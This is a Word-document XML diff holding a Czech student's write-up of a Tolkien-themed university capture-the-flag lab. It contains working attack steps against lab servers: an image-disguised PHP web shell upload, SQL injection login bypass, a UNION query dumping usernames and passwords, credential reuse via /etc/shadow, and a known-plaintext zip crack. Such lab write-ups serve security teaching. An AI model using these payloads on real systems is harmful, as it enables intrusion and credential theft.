+        <w:t>Not even his very close elven friend - admin, who shares many secrets with the king - cannot access it. However, while the king keeps an eye on his secret, he may overlook access restrictions to some other important files. Find out how to control his friend - admin - and search some other interesting files to find out, how to bypass the king's guards. Perhaps, you should start gathering other information about his friend somewhere else.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Pravděpodobně se jedná o tajemství na serveru 10.89.1.158</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> se službou ftp na portu 21</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Lze se na něj připojit pomocí </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>10.89.1.158 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Pomocí </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>nmap 10.89.1.158 21 -A</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> jsem zjistil, že verze serveru je </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>vsftpd 2.0.8 or later</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, což jsem ale nijak nevyužil</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Díky řešení tajemství D, jsem našel přihlašovací údaje </w:t>
+      </w:r>
+      <w:r>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:t>dmin iloveyou.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Vytvořil jsem si na svém stroji SOCKS5 připojení přes user@bis.fit.vvutbr.cz na FTP server a začal jsem si prohlížet soubory</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Po delším hledání jsem zjistil, že v /etc/shadow mají admin a theoden stejný hash hesla</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (což sedělo s nápovědou v popisu tajemství)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Po vyzkoušení stejného hesla „iloveyou“ jako uživatel „theoden“ jsem v jeho domácí složce našel soubor secret.txt, který obsahoval tajemství B</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>C</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Secret C is easily retrieved from lousy workers at the elven kingdom. They barely check the outside of the incoming packages, let alone the insides. All they do is check the outsides and look on the lable, which describes the insides. Snuck a fake, possibly malicious package - a php script-like payload - through the input checkers and the secret is yours.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Jedná se o tajemství na serveru 10.89.1.159. Pomocí příkazu curl jsem si stáhl obsah http stránky. Je možné se odkázat na authentication.html, který obsahuje formu s jménem a heslem, a upload.html, který má formu pro uložení souboru. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Zkoušel jsem uložit nějaký soubor na upload.php. Zjistil jsem ale, že požaduje MIME typ image. Je tedy potřeba php skript „obalit“ headrem, aby se tvářil jako obrázek. Toho jsem docílil pomocí skriptu:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="typewrite"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t>#!/bin/sh</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>echo -ne '\xFF\xD8\xFF\xE0' &gt; shell.jpeg.php # JPEG header</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>cat shell.php &gt;&gt; shell.jpeg.php              # Append PHP shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Který obalí soubor shell.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>php (který neměl nijak zajímavý kód)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a uloží ho jako shell.jp</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:t>g</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.php</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Tento soubor se mi už povedlo nahrát</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> příkazem:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="typewrite"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">curl  -X POST -F "file=@shell.jpeg.php" http://10.89.1.159/upload.php </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Potom mi server </w:t>
+      </w:r>
+      <w:r>
+        <w:t>odpověděl</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> tajemství</w:t>
+      </w:r>
+      <w:r>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> C.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+        <w:ind w:left="1418" w:hanging="851"/>
+      </w:pPr>
+      <w:r>
+        <w:t>D</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The dark forest is a place of many webs and bugs, some of them hardly visible. Those who can not find their way should verify themselves to the forest and the way shall be pointed to them. Once you arrive to the right place, perhaps ask not only about items, but about the contents of the previous verification too. Some </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>say</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the best way to approach this task is through union.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Jedná se o tajemství na serveru 10.89.1.159. Pomocí příkazu curl jsem si stáhl obsah http stránky.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Je možné se odkázat na authentication.html, který obsahuje formu s jménem a heslem, a upload.html, který má formu pro uložení souboru. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Z authentication.html je vidět, že při POST je volán skript authenticate.php. Zkusil jsem na něj jednoduchý SQL injection </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">curl -i -X POST http://10.89.1.159/authenticate.php -d "username=' OR 1=1 --&amp;password=any" </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">pro přeskočení autentizace, který fungoval. Příkaz se potom odkazoval na </w:t>
+      </w:r>
+      <w:r>
+        <w:t>list.php?id=0</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, který po jeho volání příkazem </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>curl</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> vypsal list několika elfských věcí jménem Woodelf Items.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>V popisu tajemství je zmíněn union, čímž je pravděpodobně myšlen SQL UNION. Ten kombinuje dva nebo více SELECTů do jednoho výsledku</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, přičemž musí mít stejný počet sloupců. Z formátu dotazu na items je zřejmé, že je dotazováno na 3 sloupce, a to id, name a category. Udělal jsem teda UNION s tabulkou uživatelů. Je potřeba doplnit jeden „dummy“ sloupec</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a použít GET dotaz</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="typewrite"/>
+      </w:pPr>
+      <w:r>
+        <w:t>curl http://10.89.1.159/list.php?id=0%20UNION%20SELECT%20username,password,1%20FROM%20users</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Tím je na konci výsledku tajemství D</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Také jsem zjistil zajímavý záznam, který jsem využil v tajemství B:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{"0":"admin","id":"admin","1":"iloveyou","name":"iloveyou","2":1,"category":1}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>E</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>On thing is for sure - you are always welcome here in the house of Elrond. Your old friend said, that he has an interesting artefact. A chest with a damaged lid - to a common bystander, this chest looks like a junk. But Elrond is very persistent - he knows that the chest hides something.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">V domácí složce uživatele jsem našel .ssh, v které jsem následně našel privátní ssh klíč a configuraci pro ssh připojení uživatele elrond využívající tento klíč. Chybělo ale nastavení HostName. Jelikož </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>v době mého řešení už nebyli dostupné hostname jednotlivých serverů, zkusil jsem se připojit na servery podporující ssh.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Příkazem </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ssh -i ~/.ssh/id_rsa elrond@10.89.1.156, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>jsem se připojil k</w:t>
+      </w:r>
+      <w:r>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>servru</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Zkusil jsem pomocí příkazu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>hostname</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> zjistit jméno serveru, ale výsledek </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>a873d388b394</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> nebyl moc nápomocný</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>V </w:t>
+      </w:r>
+      <w:r>
+        <w:t>„</w:t>
+      </w:r>
+      <w:r>
+        <w:t>~</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> složce elronda nebylo nic zajímavého, ale </w:t>
+      </w:r>
+      <w:r>
+        <w:t>v „</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> byla složka </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>shrine</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> jejímž majitelem byl elrond a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> ve které byly soubory </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>chest.img</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>binary_outpu.bin</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Pomocí nástroje </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>binwalk</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, jsem zjistil že se v chest.img nachází</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> zip</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>scroll.xml</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Pro přístup k němu je potřeba heslo.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Zjistil jsem, že zip se ve chest.img nachází s offsetem 41943040. Pomocí </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>dd</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> jsem si ho extrahoval</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Jelikož mi toto zůstalo jako poslední tajemství, použil jsem known plain-text attack s xml hlavičkou </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Pomocí nástroje bkcrack jsem potom do minuty zjistil 3 možné klíče a jemi jsem si odemkl zip, opět nástrojem bkcrack. V scroll.xml již pak bylo</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> tajemství E</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
     </w:p>
     <w:sectPr>
+      <w:footerReference w:type="default" r:id="rId8"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -1269,6 +1416,98 @@
 </w:document>
 </file>
 
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+  <w:sdt>
+    <w:sdtPr>
+      <w:id w:val="1160656540"/>
+      <w:docPartObj>
+        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
+        <w:docPartUnique/>
+      </w:docPartObj>
+    </w:sdtPr>
+    <w:sdtContent>
+      <w:p>
+        <w:pPr>
+          <w:pStyle w:val="Zpat"/>
+          <w:jc w:val="right"/>
+        </w:pPr>
+        <w:r>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
+        </w:r>
+        <w:r>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:p>
+    </w:sdtContent>
+  </w:sdt>
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="Zpat"/>
+    </w:pPr>
+  </w:p>
+</w:ftr>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
+</file>
+
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
@@ -1387,7 +1626,7 @@
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="149710FB"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="74E02A7C"/>
+    <w:tmpl w:val="1A7C7DCE"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="upperRoman"/>
@@ -1398,7 +1637,7 @@
         <w:tabs>
           <w:tab w:val="num" w:pos="1134"/>
         </w:tabs>
-        <w:ind w:left="567" w:firstLine="0"/>
+        <w:ind w:left="567" w:hanging="227"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:hint="default"/>
@@ -1928,6 +2167,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="39930D71"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9D321C58"/>
+    <w:lvl w:ilvl="0" w:tplc="04050001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
